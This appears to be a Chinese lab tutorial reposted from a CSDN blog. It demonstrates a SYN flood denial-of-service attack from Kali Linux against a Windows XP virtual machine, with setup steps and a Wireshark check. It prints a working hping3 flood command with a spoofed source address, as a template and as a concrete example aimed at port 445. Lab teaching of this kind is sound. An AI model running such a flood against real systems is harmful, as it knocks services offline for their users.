网络基础之SYN Flooding攻击

  Synflooding(同步泛滥技术)攻击手段。这种攻击手段一点也不新鲜,是一种最古老的攻击手段,用通俗的话讲,就是拒绝服务攻击(DDoS),该攻击利用TCP/IP协议天生的特点,通过大量的虚假IP地址建立不完整连接,使得服务器超载,陷入瘫痪状态。 

实验环境:

攻击机:Kali Linux

靶  机:Windows XP

网卡连接:NAT(Vmnet 8)

IP地址:自动获取(通过Vmware软件自动分配IP地址)

  • 实验步骤:

1、查看IP地址:

Kalinux: ifconfig  eth0

Windows XP: ipconfig  /all

判断2台主机IP地址在同一个IP网段。

2、连通性测试:

Windows XP:关闭防火墙

Kali Linux:ping  WindowsXP的IP地址

3、SYN Flooding攻击

攻击前——Windows XP:打开任务管理器---性能(监控CPU资源的占用率)

Kali Linux:

 hping3 -q -n -a 伪造源IP地址 -S -s 伪造源端口 --keep -p 攻击的目标端口 --flood  目标IP(WinXP)

例如:

 hping3 -q -n -a 2.2.2.2 -S -s 53 --keep -p 445 --flood 192.168.26.129

4、查看攻击效果:

攻击后——查看Windows XP的CPU资源占用率是否为100%,或是居高不下。

5、在物理机上启动WireShark:

选择Vmnet8网卡---抓包---是否看到大量的源地址为2.2.2.2的TCP包

 

猜你喜欢

转载自blog.csdn.net/weixin_41432553/article/details/89504391